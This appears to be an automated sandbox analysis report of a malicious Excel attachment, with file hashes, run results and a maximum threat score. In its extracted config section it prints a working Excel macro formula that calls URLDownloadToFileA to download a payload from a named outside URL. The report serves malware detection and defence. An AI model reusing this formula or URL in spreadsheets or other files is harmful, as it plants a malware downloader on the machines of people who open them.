General
Target: message__A9E01E9854ADB407C4B191065D99E304B19ECE92_unknown_.eml
Size: 18KB
Sample: 210305-fxgct12x66
MD5: 8a970816192957352df0217bcdb36d4a
SHA1: 48efc7f8f4f610f4fb7fde597eb026f6d451284d
SHA256: 6256f4c5ab30074d0e4e26eae4b1feeba98c42f4d3f71b8eb0e86e4990004b3d
SHA512: bb979e46337ccede084ce639922c8cbef9c2c9819a6c090c660fb7abda6875a08b09c056d67e3ef18c4241e1b2c57e3cfd2d2465d87905eca0787078a6635ef4
Behavioral task: behavioral1
Sample: document-87247454.xls
Resource: win7v20201028
Behavioral task: behavioral2
Sample: document-87247454.xls
Resource: win10v20201028
Malware Config
Extracted
http://ywgiu10zmnwcx03vpnyp.com/inda.xls
formulas
=CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://ywgiu10zmnwcx03vpnyp.com/inda.xls","..\fkruf.djr",0)
Extracted
http://ywgiu10zmnwcx03vpnyp.com/inda.xls
Targets
Target: document-87247454.xls
Size: 40KB
MD5: e9e5d831d3d478971af9579f7e15722f
SHA1: ddccda0b12d0669c3400c9e24f1cc641dc9d128f
SHA256: 4a62d024a5a5ec539df5c50039879221170a508c74fb29a96ee7c3ff785ba300
SHA512: 7b6ea9028be2acefeccc7fe406f8c946251b454f31a8220baa8f1254b768a5fe3847d974446eb30821e052e5ce57690e6d7158352ab7381ed6eb54cf427a7b36
Score: 10/10
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.